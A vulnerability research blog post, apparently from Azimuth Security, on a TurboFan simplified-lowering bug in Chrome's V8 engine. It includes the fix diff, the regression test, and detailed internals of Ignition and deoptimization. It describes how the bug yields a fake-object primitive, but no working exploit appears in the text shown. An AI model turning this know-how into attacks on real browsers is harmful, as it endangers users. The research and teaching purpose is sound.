Introduction

Late 2019, I presented at an internal Azimuth Security conference some work on hacking Chrome through it's JavaScript engine.

One of the topics I've been playing with at that time was deoptimization and so I discussed, among others, vulnerabilities in the deoptimizer. For my talk at InfiltrateCon 2020 in Miami I was planning to discuss several components of V8. One of them was the deoptimizer. But as you all know, things didn't quite go as expected this year and the event has been postponed several times.

This blog post is actually an internal write-up I made for Azimuth Security a year ago and we decided to finally release it publicly.

Also, if you want to get serious about breaking browsers and feel like joining us, we're currently looking for experienced hackers (US/AU/UK/FR or anywhere else remotely). Feel free to reach out on twitter or by e-mail.

Special thanks to the legendary Mark Dowd and John McDonald for letting me publish this here.

For those unfamiliar with TurboFan, you may want to read an Introduction to TurboFan first. Also, Benedikt Meurer gave a lot of very interesting talks that are strongly recommended to anyone interested in better understanding V8's internals.

Motivation

The commit

To understand this security bug, it is necessary to delve into V8's internals.

Let's start with what the commit says:

Fixes word64-lowered BigInt in FrameState accumulator

Bug: chromium:1016450
Change-Id: I4801b5ffb0ebea92067aa5de37e11a4e75dcd3c0
Reviewed-on: https://chromium-review.googlesource.com/c/v8/v8/+/1873692
Reviewed-by: Georg Neis <neis@chromium.org>
Commit-Queue: Nico Hartmann <nicohartmann@chromium.org>
Cr-Commit-Position: refs/heads/master@{#64469}

It fixes VisitFrameState and VisitStateValues in src/compiler/simplified-lowering.cc.

diff --git a/src/compiler/simplified-lowering.cc b/src/compiler/simplified-lowering.cc
index 2e8f40f..abbdae3 100644
--- a/src/compiler/simplified-lowering.cc
+++ b/src/compiler/simplified-lowering.cc
@@ -1197,7 +1197,7 @@
         // TODO(nicohartmann): Remove, once the deoptimizer can rematerialize
         // truncated BigInts.
         if (TypeOf(input).Is(Type::BigInt())) {
-          ProcessInput(node, i, UseInfo::AnyTagged());
+          ConvertInput(node, i, UseInfo::AnyTagged());
         }

         (*types)[i] =
@@ -1220,11 +1220,22 @@
     // Accumulator is a special flower - we need to remember its type in
     // a singleton typed-state-values node (as if it was a singleton
     // state-values node).
+    Node* accumulator = node->InputAt(2);
     if (propagate()) {
-      EnqueueInput(node, 2, UseInfo::Any());
+      // TODO(nicohartmann): Remove, once the deoptimizer can rematerialize
+      // truncated BigInts.
+      if (TypeOf(accumulator).Is(Type::BigInt())) {
+        EnqueueInput(node, 2, UseInfo::AnyTagged());
+      } else {
+        EnqueueInput(node, 2, UseInfo::Any());
+      }
     } else if (lower()) {
+      // TODO(nicohartmann): Remove, once the deoptimizer can rematerialize
+      // truncated BigInts.
+      if (TypeOf(accumulator).Is(Type::BigInt())) {
+        ConvertInput(node, 2, UseInfo::AnyTagged());
+      }
       Zone* zone = jsgraph_->zone();
-      Node* accumulator = node->InputAt(2);
       if (accumulator == jsgraph_->OptimizedOutConstant()) {
         node->ReplaceInput(2, jsgraph_->SingleDeadTypedStateValues());
       } else {
@@ -1237,7 +1248,7 @@
         node->ReplaceInput(
             2, jsgraph_->graph()->NewNode(jsgraph_->common()->TypedStateValues(
                                               types, SparseInputMask::Dense()),
-                                          accumulator));
+                                          node->InputAt(2)));
       }
     }

This can be linked to a different commit that adds a related regression test:

Regression test for word64-lowered BigInt accumulator

This issue was fixed in https://chromium-review.googlesource.com/c/v8/v8/+/1873692

Bug: chromium:1016450
Change-Id: I56e1c504ae6876283568a88a9aa7d24af3ba6474
Reviewed-on: https://chromium-review.googlesource.com/c/v8/v8/+/1876057
Commit-Queue: Nico Hartmann <nicohartmann@chromium.org>
Auto-Submit: Nico Hartmann <nicohartmann@chromium.org>
Reviewed-by: Jakob Gruber <jgruber@chromium.org>
Reviewed-by: Georg Neis <neis@chromium.org>
Cr-Commit-Position: refs/heads/master@{#64738}

// Copyright 2019 the V8 project authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

// Flags: --allow-natives-syntax --opt --no-always-opt

let g = 0;

function f(x) {
  let y = BigInt.asUintN(64, 15n);
  // Introduce a side effect to force the construction of a FrameState that
  // captures the value of y.
  g = 42;
  try {
    return x + y;
  } catch(_) {
    return y;
  }
}


%PrepareFunctionForOptimization(f);
assertEquals(16n, f(1n));
assertEquals(17n, f(2n));
%OptimizeFunctionOnNextCall(f);
assertEquals(16n, f(1n));
assertOptimized(f);
assertEquals(15n, f(0));
assertUnoptimized(f);

Long story short

This vulnerability is a bug in the way the simplified lowering phase of TurboFan deals with FrameState and StateValues nodes. Those nodes are related to deoptimization.

During the code generation phase, using those nodes, TurboFan builds deoptimization input data that are used when the runtime bails out to the deoptimizer.

Because after a deoptimizaton execution goes from optimized native code back to interpreted bytecode, the deoptimizer needs to know where to deoptimize to (ex: which bytecode offset?) and how to build a correct frame (ex: what ignition registers?). To do that, the deoptimizer uses those deoptimization input data built during code generation.

Using this bug, it is possible to make code generation incorrectly build deoptimization input data so that the deoptimizer will materialize a fake object. Then, it redirects the execution to an ignition bytecode handler that has an arbitrary object pointer referenced by its accumulator register.

Internals

To understand this bug, we want to know:

what is ignition (because we deoptimize back to ignition)
what is simplified lowering (because that's where the bug is)
what is a deoptimization (because it is impacted by the bug and will materialize a fake object for us)

Ignition

Overview

V8 features an interpreter called Ignition. It uses TurboFan's macro-assembler. This assembler is architecture-independent and TurboFan is responsible for compiling these instructions down to the target architecture.

Ignition is a register machine. That means opcode's inputs and output are using only registers. There is an accumulator used as an implicit operand for many opcodes.

For every opcode, an associated handler is generated. Therefore, executing bytecode is mostly a matter of fetching the current opcode and dispatching it to the correct handler.

Let's observe the bytecode for a simple JavaScript function.

let opt_me = (o, val) => {
  let value = val + 42;
  o.x = value;
}
opt_me({x:1.1});

Using the --print-bytecode and --print-bytecode-filter=opt_me flags we can dump the corresponding generated bytecode.

Parameter count 3
Register count 1
Frame size 8
   13 E> 0000017DE515F366 @    0 : a5                StackCheck
   41 S> 0000017DE515F367 @    1 : 25 02             Ldar a1
   45 E> 0000017DE515F369 @    3 : 40 2a 00          AddSmi [42], [0]
         0000017DE515F36C @    6 : 26 fb             Star r0
   53 S> 0000017DE515F36E @    8 : 25 fb             Ldar r0
   57 E> 0000017DE515F370 @   10 : 2d 03 00 01       StaNamedProperty a0, [0], [1]
         0000017DE515F374 @   14 : 0d                LdaUndefined
   67 S> 0000017DE515F375 @   15 : a9                Return
Constant pool (size = 1)
0000017DE515F319: [FixedArray] in OldSpace
 - map: 0x00d580740789 <Map>
 - length: 1
           0: 0x017de515eff9 <String[#1]: x>
Handler Table (size = 0)

Disassembling the function shows that the low level code is merely a trampoline to the interpreter entry point. In our case, running an x64 build, that means the trampoline jumps to the code generated by Builtins::Generate_InterpreterEntryTrampoline in src/builtins/x64/builtins-x64.cc.

d8> %DisassembleFunction(opt_me)
0000008C6B5043C1: [Code]
 - map: 0x02ebfe8409b9 <Map>
kind = BUILTIN
name = InterpreterEntryTrampoline
compiler = unknown
address = 0000004B05BFE830

Trampoline (size = 13)
0000008C6B504400     0  49ba80da52b0fd7f0000 REX.W movq r10,00007FFDB052DA80  (InterpreterEntryTrampoline)
0000008C6B50440A     a  41ffe2         jmp r10

This code simply fetches the instructions from the function's BytecodeArray and executes the corresponding ignition handler from a dispatch table.

d8> %DebugPrint(opt_me)
DebugPrint: 000000FD8C6CA819: [Function]
// ...
 - code: 0x01524c1c43c1 <Code BUILTIN InterpreterEntryTrampoline>
 - interpreted
 - bytecode: 0x01b76929f331 <BytecodeArray[16]>
// ...

Below is the part of Builtins::Generate_InterpreterEntryTrampoline that loads the address of the dispatch table into the kInterpreterDispatchTableRegister. Then it selects the current opcode using the kInterpreterBytecodeOffsetRegister and kInterpreterBytecodeArrayRegister. Finally, it computes kJavaScriptCallCodeStartRegister = dispatch_table[bytecode * pointer_size] and then calls the handler. Those registers are described in src\codegen\x64\register-x64.h.

  // Load the dispatch table into a register and dispatch to the bytecode
  // handler at the current bytecode offset.
  Label do_dispatch;
  __ bind(&do_dispatch);
  __ Move(
      kInterpreterDispatchTableRegister,
      ExternalReference::interpreter_dispatch_table_address(masm->isolate()));
  __ movzxbq(r11, Operand(kInterpreterBytecodeArrayRegister,
                          kInterpreterBytecodeOffsetRegister, times_1, 0));
  __ movq(kJavaScriptCallCodeStartRegister,
          Operand(kInterpreterDispatchTableRegister, r11,
                  times_system_pointer_size, 0));
  __ call(kJavaScriptCallCodeStartRegister);
  masm->isolate()->heap()->SetInterpreterEntryReturnPCOffset(masm->pc_offset());

  // Any returns to the entry trampoline are either due to the return bytecode
  // or the interpreter tail calling a builtin and then a dispatch.

  // Get bytecode array and bytecode offset from the stack frame.
  __ movq(kInterpreterBytecodeArrayRegister,
          Operand(rbp, InterpreterFrameConstants::kBytecodeArrayFromFp));
  __ movq(kInterpreterBytecodeOffsetRegister,
          Operand(rbp, InterpreterFrameConstants::kBytecodeOffsetFromFp));
  __ SmiUntag(kInterpreterBytecodeOffsetRegister,
              kInterpreterBytecodeOffsetRegister);

  // Either return, or advance to the next bytecode and dispatch.
  Label do_return;
  __ movzxbq(rbx, Operand(kInterpreterBytecodeArrayRegister,
                          kInterpreterBytecodeOffsetRegister, times_1, 0));
  AdvanceBytecodeOffsetOrReturn(masm, kInterpreterBytecodeArrayRegister,
                                kInterpreterBytecodeOffsetRegister, rbx, rcx,
                                &do_return);
  __ jmp(&do_dispatch);

Ignition handlers

Ignitions handlers are implemented in src/interpreter/interpreter-generator.cc. They are declared using the IGNITION_HANDLER macro. Let's look at a few examples.

Below is the implementation of JumpIfTrue. The careful reader will notice that it is actually similar to the Code Stub Assembler code (used to implement some of the builtins).

// JumpIfTrue <imm>
//
// Jump by the number of bytes represented by an immediate operand if the
// accumulator contains true. This only works for boolean inputs, and
// will misbehave if passed arbitrary input values.
IGNITION_HANDLER(JumpIfTrue, InterpreterAssembler) {
  Node* accumulator = GetAccumulator();
  Node* relative_jump = BytecodeOperandUImmWord(0);
  CSA_ASSERT(this, TaggedIsNotSmi(accumulator));
  CSA_ASSERT(this, IsBoolean(accumulator));
  JumpIfWordEqual(accumulator, TrueConstant(), relative_jump);
}

Binary instructions making use of inline caching actually execute code implemented in src/ic/binary-op-assembler.cc.

// AddSmi <imm>
//
// Adds an immediate value <imm> to the value in the accumulator.
IGNITION_HANDLER(AddSmi, InterpreterBinaryOpAssembler) {
  BinaryOpSmiWithFeedback(&BinaryOpAssembler::Generate_AddWithFeedback);
}

void BinaryOpWithFeedback(BinaryOpGenerator generator) {
    Node* lhs = LoadRegisterAtOperandIndex(0);
    Node* rhs = GetAccumulator();
    Node* context = GetContext();
    Node* slot_index = BytecodeOperandIdx(1);
    Node* maybe_feedback_vector = LoadFeedbackVector();

    BinaryOpAssembler binop_asm(state());
    Node* result = (binop_asm.*generator)(context, lhs, rhs, slot_index,
                                          maybe_feedback_vector, false);
    SetAccumulator(result);
    Dispatch();
}

From this code, we understand that when executing AddSmi [42], [0], V8 ends-up executing code generated by BinaryOpAssembler::Generate_AddWithFeedback. The left hand side of the addition is the operand 0 ([42] in this case), the right hand side is loaded from the accumulator register. It also loads a slot from the feedback vector using the index specified in operand 1. The result of the addition is stored in the accumulator.

It is interesting to point out to observe the call to Dispatch. We may expect that every handler is called from within the do_dispatch label of InterpreterEntryTrampoline whereas actually the current ignition handler may do the dispatch itself (and thus does not directly go back to the do_dispatch)

Debugging

There is a built-in feature for debugging ignition bytecode that you can enable by switching v8_enable_trace_ignition to true and recompile the engine. You may also want to change v8_enable_trace_feedbacks.

This unlocks some interesting flags in the d8 shell such as:

--trace-ignition
--trace_feedback_updates

There are also a few interesting runtime functions:

Runtime_InterpreterTraceBytecodeEntry
- prints ignition registers before executing an opcode
Runtime_InterpreterTraceBytecodeExit
- prints ignition registers after executing an opcode
Runtime_InterpreterTraceUpdateFeedback
- displays updates to the feedback vector slots

Let's try debugging a simple add function.

function add(a,b) {
    return a + b;
}

We can now see a dump of ignition registers at every step of the execution using --trace-ignition.

      [          r1 -> 0x193680a1f8e9 <JSFunction add (sfi = 0x193680a1f759)> ]
      [          r2 -> 0x3ede813004a9 <undefined> ]
      [          r3 -> 42 ]
      [          r4 -> 1 ]
 -> 0x193680a1fa56 @    0 : a5                StackCheck 
 -> 0x193680a1fa57 @    1 : 25 02             Ldar a1
      [          a1 -> 1 ]
      [ accumulator <- 1 ]
 -> 0x193680a1fa59 @    3 : 34 03 00          Add a0, [0]
      [ accumulator -> 1 ]
      [          a0 -> 42 ]
      [ accumulator <- 43 ]
 -> 0x193680a1fa5c @    6 : a9                Return 
      [ accumulator -> 43 ]
 -> 0x193680a1f83a @   36 : 26 fb             Star r0
      [ accumulator -> 43 ]
      [          r0 <- 43 ]
 -> 0x193680a1f83c @   38 : a9                Return 
      [ accumulator -> 43 ]

Simplified lowering

Simplified lowering is actually divided into three main phases :

The truncation propagation phase (RunTruncationPropagationPhase)
- backward propagation of truncations
The type propagation phase (RunTypePropagationPhase)
- forward propagation of types from type feedback
The lowering phase (Run, after calling the previous phases)
- may lower nodes
- may insert conversion nodes

To get a better understanding, we'll study the evolution of the sea of nodes graph for the function below :

function f(a) {
  if (a) {
    var x = 2;
  }
  else {
    var x = 5;
  }
  return 0x42 % x;
}
%PrepareFunctionForOptimization(f);
f(true);
f(false);
%OptimizeFunctionOnNextCall(f);
f(true);

Propagating truncations

To understand how truncations get propagated, we want to trace the simplified lowering using --trace-representation and look at the sea of nodes in Turbolizer right before the simplified lowering phase, which is by selecting the escape analysis phase in the menu.

The first phase starts from the End node. It visits the node and then enqueues its inputs. It doesn't truncate any of its inputs. The output is tagged.

 visit #31: End (trunc: no-value-use)
  initial #30: no-value-use

  void VisitNode(Node* node, Truncation truncation,
                 SimplifiedLowering* lowering) {
  // ...
      case IrOpcode::kEnd:
       // ...
      case IrOpcode::kJSParseInt:
        VisitInputs(node);
        // Assume the output is tagged.
        return SetOutput(node, MachineRepresentation::kTagged);

Then, for every node in the queue, the corresponding visitor is called. In that case, only a Return node is in the queue.

The visitor indicates use informations. The first input is truncated to a word32. The other inputs are not truncated. The output is tagged.

  void VisitNode(Node* node, Truncation truncation,
                 SimplifiedLowering* lowering) {
    // ...
    switch (node->opcode()) {
      // ...
      case IrOpcode::kReturn:
        VisitReturn(node);
        // Assume the output is tagged.
        return SetOutput(node, MachineRepresentation::kTagged);
      // ...
    }
  }

  void VisitReturn(Node* node) {
    int tagged_limit = node->op()->ValueInputCount() +
                       OperatorProperties::GetContextInputCount(node->op()) +
                       OperatorProperties::GetFrameStateInputCount(node->op());
    // Visit integer slot count to pop
    ProcessInput(node, 0, UseInfo::TruncatingWord32());

    // Visit value, context and frame state inputs as tagged.
    for (int i = 1; i < tagged_limit; i++) {
      ProcessInput(node, i, UseInfo::AnyTagged());
    }
    // Only enqueue other inputs (effects, control).
    for (int i = tagged_limit; i < node->InputCount(); i++) {
      EnqueueInput(node, i);
    }
  }

In the trace, we indeed observe that the End node didn't propagate any truncation to the Return node. However, the Return node does truncate its first input.

 visit #30: Return (trunc: no-value-use)
  initial #29: truncate-to-word32
  initial #28: no-truncation (but distinguish zeros)
   queue #28?: no-truncation (but distinguish zeros)
  initial #21: no-value-use

All the inputs (29, 28 21) are set in the queue and now have to be visited.

We can see that the truncation to word32 has been propagated to the node 29.

 visit #29: NumberConstant (trunc: truncate-to-word32)

When visiting the node 28, the visitor for SpeculativeNumberModulus, in that case, decides that the first two inputs should get truncated to word32.

 visit #28: SpeculativeNumberModulus (trunc: no-truncation (but distinguish zeros))
  initial #24: truncate-to-word32
  initial #23: truncate-to-word32
  initial #13: no-value-use
   queue #21?: no-value-use

Indeed, if we look at the code of the visitor, if both inputs are typed as Type::Unsigned32OrMinusZeroOrNaN(), which is the case since they are typed as Range(66,66) and Range(2,5) , and the node truncation is a word32 truncation (not the case here since there is no truncation) or the node is typed as Type::Unsigned32() (true because the node is typed as Range(0,4)) then, a call to VisitWord32TruncatingBinop is made.

This visitor indicates a truncation to word32 on the first two inputs and sets the output representation to Any. It also add all the inputs to the queue.

  void VisitSpeculativeNumberModulus(Node* node, Truncation truncation,
                                     SimplifiedLowering* lowering) {
    if (BothInputsAre(node, Type::Unsigned32OrMinusZeroOrNaN()) &&
        (truncation.IsUsedAsWord32() ||
         NodeProperties::GetType(node).Is(Type::Unsigned32()))) {
      // => unsigned Uint32Mod
      VisitWord32TruncatingBinop(node);
      if (lower()) DeferReplacement(node, lowering->Uint32Mod(node));
      return;
    }
    // ...
  }

  void VisitWord32TruncatingBinop(Node* node) {
    VisitBinop(node, UseInfo::TruncatingWord32(),
               MachineRepresentation::kWord32);
  }

  // Helper for binops of the I x I -> O variety.
  void VisitBinop(Node* node, UseInfo input_use, MachineRepresentation output,
                  Type restriction_type = Type::Any()) {
    VisitBinop(node, input_use, input_use, output, restriction_type);
  }

  // Helper for binops of the R x L -> O variety.
  void VisitBinop(Node* node, UseInfo left_use, UseInfo right_use,
                  MachineRepresentation output,
                  Type restriction_type = Type::Any()) {
    DCHECK_EQ(2, node->op()->ValueInputCount());
    ProcessInput(node, 0, left_use);
    ProcessInput(node, 1, right_use);
    for (int i = 2; i < node->InputCount(); i++) {
      EnqueueInput(node, i);
    }
    SetOutput(node, output, restriction_type);
  }

For the next node in the queue (#21), the visitor doesn't indicate any truncation.

 visit #21: Merge (trunc: no-value-use)
  initial #19: no-value-use
  initial #17: no-value-use

It simply adds its own inputs to the queue and indicates that this Merge node has a kTagged output representation.

  void VisitNode(Node* node, Truncation truncation,
                 SimplifiedLowering* lowering) {
  // ...
      case IrOpcode::kMerge:
      // ...
      case IrOpcode::kJSParseInt:
        VisitInputs(node);
        // Assume the output is tagged.
        return SetOutput(node, MachineRepresentation::kTagged);

The SpeculativeNumberModulus node indeed propagated a truncation to word32 to its inputs 24 (NumberConstant) and 23 (Phi).

 visit #24: NumberConstant (trunc: truncate-to-word32)
 visit #23: Phi (trunc: truncate-to-word32)
  initial #20: truncate-to-word32
  initial #22: truncate-to-word32
   queue #21?: no-value-use
 visit #13: JSStackCheck (trunc: no-value-use)
  initial #12: no-truncation (but distinguish zeros)
  initial #14: no-truncation (but distinguish zeros)
  initial #6: no-value-use
  initial #0: no-value-use

Now let's have a look at the phi visitor. It simply forwards the propagations to its inputs and adds them to the queue. The output representation is inferred from the phi node's type.

  // Helper for handling phis.
  void VisitPhi(Node* node, Truncation truncation,
                SimplifiedLowering* lowering) {
    MachineRepresentation output =
        GetOutputInfoForPhi(node, TypeOf(node), truncation);
    // Only set the output representation if not running with type
    // feedback. (Feedback typing will set the representation.)
    SetOutput(node, output);

    int values = node->op()->ValueInputCount();
    if (lower()) {
      // Update the phi operator.
      if (output != PhiRepresentationOf(node->op())) {
        NodeProperties::ChangeOp(node, lowering->common()->Phi(output, values));
      }
    }

    // Convert inputs to the output representation of this phi, pass the
    // truncation along.
    UseInfo input_use(output, truncation);
    for (int i = 0; i < node->InputCount(); i++) {
      ProcessInput(node, i, i < values ? input_use : UseInfo::None());
    }
  }

Finally, the phi node's inputs get visited.

 visit #20: NumberConstant (trunc: truncate-to-word32)
 visit #22: NumberConstant (trunc: truncate-to-word32)

They don't have any inputs to enqueue. Output representation is set to tagged signed.

      case IrOpcode::kNumberConstant: {
        double const value = OpParameter<double>(node->op());
        int value_as_int;
        if (DoubleToSmiInteger(value, &value_as_int)) {
          VisitLeaf(node, MachineRepresentation::kTaggedSigned);
          if (lower()) {
            intptr_t smi = bit_cast<intptr_t>(Smi::FromInt(value_as_int));
            DeferReplacement(node, lowering->jsgraph()->IntPtrConstant(smi));
          }
          return;
        }
        VisitLeaf(node, MachineRepresentation::kTagged);
        return;
      }

We've unrolled enough of the algorithm by hand to understand the first truncation propagation phase. Let's have a look at the type propagation phase.

Please note that a visitor may behave differently according to the phase that is currently being executing.

  bool lower() const { return phase_ == LOWER; }
  bool retype() const { return phase_ == RETYPE; }
  bool propagate() const { return phase_ == PROPAGATE; }

That's why the NumberConstant visitor does not trigger a DeferReplacement during the truncation propagation phase.

Retyping

There isn't so much to say about the retyping phase. Starting from the End node, every node of the graph is put in a stack. Then, starting from the top of the stack, types are updated with UpdateFeedbackType and revisited. This allows to forward propagate updated type information (starting from the Start, not the End).

As we can observe by tracing the phase, that's when final output representations are computed and displayed :

 visit #29: NumberConstant
  ==> output kRepTaggedSigned

For nodes 23 (phi) and 28 (SpeculativeNumberModulus), there is also an updated feedback type.

#23:Phi[kRepTagged](#20:NumberConstant, #22:NumberConstant, #21:Merge)  [Static type: Range(2, 5)]
 visit #23: Phi
  ==> output kRepWord32

#28:SpeculativeNumberModulus[SignedSmall](#24:NumberConstant, #23:Phi, #13:JSStackCheck, #21:Merge)  [Static type: Range(0, 4)]
 visit #28: SpeculativeNumberModulus
  ==> output kRepWord32

Lowering and inserting conversions

Now that every node has been associated with use informations for every input as well as an output representation, the last phase consists in :

lowering the node itself to a more specific one (via a DeferReplacement for instance)
converting nodes when the output representation of an input doesn't match with the expected use information for this input (could be done with ConvertInput)

Note that a node won't necessarily change. There may not be any lowering and/or any conversion.

Let's get through the evolution of a few nodes. The NumberConstant #29 will be replaced by the Int32Constant #41. Indeed, the output of the NumberConstant @29 has a kRepTaggedSigned representation. However, because it is used as its first input, the Return node wants it to be truncated to word32. Therefore, the node will get converted. This is done by the ConvertInput function. It will itself call the representation changer via the function GetRepresentationFor. Because the truncation to word32 is requested, execution is redirected to RepresentationChanger::GetWord32RepresentationFor which then calls MakeTruncatedInt32Constant.

Node* RepresentationChanger::MakeTruncatedInt32Constant(double value) {
  return jsgraph()->Int32Constant(DoubleToInt32(value));
}

visit #30: Return
  change: #30:Return(@0 #29:NumberConstant)  from kRepTaggedSigned to kRepWord32:truncate-to-word32

For the second input of the Return node, the use information indicates a tagged representation and no truncation. However, the second input (SpeculativeNumberModulus #28) has a kRepWord32 output representation. Again, it doesn't match and when calling ConvertInput the representation changer will be used. This time, the function used is RepresentationChanger::GetTaggedRepresentationFor. If the type of the input (node #28) is a Signed31, then TurboFan knows it can use a ChangeInt31ToTaggedSigned operator to make the conversion. This is the case here because the type computed for node 28 is Range(0,4).

// ...
    else if (IsWord(output_rep)) {
    if (output_type.Is(Type::Signed31())) {
      op = simplified()->ChangeInt31ToTaggedSigned();
    }

visit #30: Return
  change: #30:Return(@1 #28:SpeculativeNumberModulus)  from kRepWord32 to kRepTagged:no-truncation (but distinguish zeros)

The last example we'll go through is the case of the SpeculativeNumberModulus node itself.

 visit #28: SpeculativeNumberModulus
  change: #28:SpeculativeNumberModulus(@0 #24:NumberConstant)  from kRepTaggedSigned to kRepWord32:truncate-to-word32
// (comment) from #24:NumberConstant to #44:Int32Constant
defer replacement #28:SpeculativeNumberModulus with #60:Phi

If we compare the graph (well, a subset), we can observe :

the insertion of the ChangeInt31ToTaggedSigned (#42), in the blue rectangle
the original inputs of node #28, before simplified lowering, are still there but attached to other nodes (orange rectangle)
node #28 has been replaced by the phi node #60 ... but it also leads to the creation of all the other nodes in the orange rectangle

This is before simplified lowering :

This is after :

The creation of all the nodes inside the green rectangle is done by SimplifiedLowering::Uint32Mod which is called by the SpeculativeNumberModulus visitor.

  void VisitSpeculativeNumberModulus(Node* node, Truncation truncation,
                                     SimplifiedLowering* lowering) {
    if (BothInputsAre(node, Type::Unsigned32OrMinusZeroOrNaN()) &&
        (truncation.IsUsedAsWord32() ||
         NodeProperties::GetType(node).Is(Type::Unsigned32()))) {
      // => unsigned Uint32Mod
      VisitWord32TruncatingBinop(node);
      if (lower()) DeferReplacement(node, lowering->Uint32Mod(node));
      return;
    }

Node* SimplifiedLowering::Uint32Mod(Node* const node) {
  Uint32BinopMatcher m(node);
  Node* const minus_one = jsgraph()->Int32Constant(-1);
  Node* const zero = jsgraph()->Uint32Constant(0);
  Node* const lhs = m.left().node();
  Node* const rhs = m.right().node();

  if (m.right().Is(0)) {
    return zero;
  } else if (m.right().HasValue()) {
    return graph()->NewNode(machine()->Uint32Mod(), lhs, rhs, graph()->start());
  }

  // General case for unsigned integer modulus, with optimization for (unknown)
  // power of 2 right hand side.
  //
  //   if rhs == 0 then
  //     zero
  //   else
  //     msk = rhs - 1
  //     if rhs & msk != 0 then
  //       lhs % rhs
  //     else
  //       lhs & msk
  //
  // Note: We do not use the Diamond helper class here, because it really hurts
  // readability with nested diamonds.
  const Operator* const merge_op = common()->Merge(2);
  const Operator* const phi_op =
      common()->Phi(MachineRepresentation::kWord32, 2);

  Node* check0 = graph()->NewNode(machine()->Word32Equal(), rhs, zero);
  Node* branch0 = graph()->NewNode(common()->Branch(BranchHint::kFalse), check0,
                                   graph()->start());

  Node* if_true0 = graph()->NewNode(common()->IfTrue(), branch0);
  Node* true0 = zero;

  Node* if_false0 = graph()->NewNode(common()->IfFalse(), branch0);
  Node* false0;
  {
    Node* msk = graph()->NewNode(machine()->Int32Add(), rhs, minus_one);

    Node* check1 = graph()->NewNode(machine()->Word32And(), rhs, msk);
    Node* branch1 = graph()->NewNode(common()->Branch(), check1, if_false0);

    Node* if_true1 = graph()->NewNode(common()->IfTrue(), branch1);
    Node* true1 = graph()->NewNode(machine()->Uint32Mod(), lhs, rhs, if_true1);

    Node* if_false1 = graph()->NewNode(common()->IfFalse(), branch1);
    Node* false1 = graph()->NewNode(machine()->Word32And(), lhs, msk);

    if_false0 = graph()->NewNode(merge_op, if_true1, if_false1);
    false0 = graph()->NewNode(phi_op, true1, false1, if_false0);
  }

  Node* merge0 = graph()->NewNode(merge_op, if_true0, if_false0);
  return graph()->NewNode(phi_op, true0, false0, merge0);
}

A high level overview of deoptimization

Understanding deoptimization requires to study several components of V8 :

instruction selection
- when descriptors for FrameState and StateValues nodes are built
code generation
- when deoptimization input data are built (that includes a Translation)
the deoptimizer
- at runtime, this is where execution is redirected to when "bailing out to deoptimization"
- uses the Translation
- translates from the current input frame (optimized native code) to the output interpreted frame (interpreted ignition bytecode)

When looking at the sea of nodes in Turbolizer, you may see different kind of nodes related to deoptimization such as :

Checkpoint
- refers to a FrameState
FrameState
- refers to a position and a state, takes StateValues as inputs
StateValues
- state of parameters, local variables, accumulator
Deoptimize / DeoptimizeIf / DeoptimizeUnless etc

There are several types of deoptimization :

eager, when you deoptimize the current function on the spot
- you just triggered a type guard (ex: wrong map, thanks to a CheckMaps node)
lazy, you deoptimize later
- another function just violated a code dependency (ex: a function call just made a map unstable, violating a stable map dependency)
soft
- a function got optimized too early, more feedback is needed

We are only discussing the case where optimized assembly code deoptimizes to ignition interpreted bytecode, that is the constructed output frame is called an interpreted frame. However, there are other kinds of frames we are not going to discuss in this article (ex: adaptor frames, builtin continuation frames, etc). Michael Stanton, a V8 dev, wrote a few interesting blog posts you may want to check.

We know that javascript first gets translated to ignition bytecode (and a feedback vector is associated to that bytecode). Then, TurboFan might kick in and generate optimized code based on speculations (using the aforementioned feedback vector). It associates deoptimization input data to this optimized code. When executing optimized code, if an assumption is violated (let's say, a type guard for instance), the flow of execution gets redirected to the deoptimizer. The deoptimizer takes those deoptimization input data to translate the current input frame and compute an output frame. The deoptimization input data tell the deoptimizer what kind of deoptimization is to be done (for instance, are we going back to some standard ignition bytecode? That implies building an interpreted frame as an output frame). They also indicate where to deoptimize to (such as the bytecode offset), what values to put in the output frame and how to translate them. Finally, once everything is ready, it returns to the ignition interpreter.

During code generation, for every instruction that has a flag indicating a possible deoptimization, a branch is generated. It either branches to a continuation block (normal execution) or to a deoptimization exit to which is attached a Translation.

To build the translation, code generation uses information from structures such as a FrameStateDescriptor and a list of StateValueDescriptor. They obviously correspond to FrameState and StateValues nodes. Those structures are built during instruction selection, not when visiting those nodes (no code generation is directly associated to those nodes, therefore they don't have associated visitors in the instruction selector).

Tracing a deoptimization

Let's get through a quick experiment using the following script.

function add_prop(x) {
let obj = {};
obj[x] = 42;
}

add_prop("x");
%PrepareFunctionForOptimization(add_prop);
add_prop("x");
add_prop("x");
add_prop("x");
%OptimizeFunctionOnNextCall(add_prop);
add_prop("x");
add_prop("different");

Now run it using --turbo-profiling and --print-code-verbose.

This allows to dump the deoptimization input data :

Deoptimization Input Data (deopt points = 5)
 index  bytecode-offset    pc  commands
     0                0   269  BEGIN {frame count=1, js frame count=1, update_feedback_count=0}
                               INTERPRETED_FRAME {bytecode_offset=0, function=0x3ee5e83df701 <String[#8]: add_prop>, height=1, retval=@0(#0)}
                               STACK_SLOT {input=3}
                               STACK_SLOT {input=-2}
                               STACK_SLOT {input=-1}
                               STACK_SLOT {input=4}
                               LITERAL {literal_id=2 (0x3ee5f5180df9 <Odd Oddball: optimized_out>)}
                               LITERAL {literal_id=2 (0x3ee5f5180df9 <Odd Oddball: optimized_out>)}

// ...

     4                6    NA  BEGIN {frame count=1, js frame count=1, update_feedback_count=0}
                               INTERPRETED_FRAME {bytecode_offset=6, function=0x3ee5e83df701 <String[#8]: add_prop>, height=1, retval=@0(#0)}
                               STACK_SLOT {input=3}
                               STACK_SLOT {input=-2}
                               REGISTER {input=rcx}
                               STACK_SLOT {input=4}
                               CAPTURED_OBJECT {length=7}
                               LITERAL {literal_id=3 (0x3ee5301c0439 <Map(HOLEY_ELEMENTS)>)}
                               LITERAL {literal_id=4 (0x3ee5f5180c01 <FixedArray[0]>)}
                               LITERAL {literal_id=4 (0x3ee5f5180c01 <FixedArray[0]>)}
                               LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
                               LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
                               LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
                               LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
                               LITERAL {literal_id=6 (42)}

And we also see the code used to bail out to deoptimization (notice that the deopt index matches with the index of a translation in the deoptimization input data).

// trimmed / simplified output
nop
REX.W movq r13,0x0       ;; debug: deopt position, script offset '17'
                         ;; debug: deopt position, inlining id '-1'
                         ;; debug: deopt reason '(unknown)'
                         ;; debug: deopt index 0
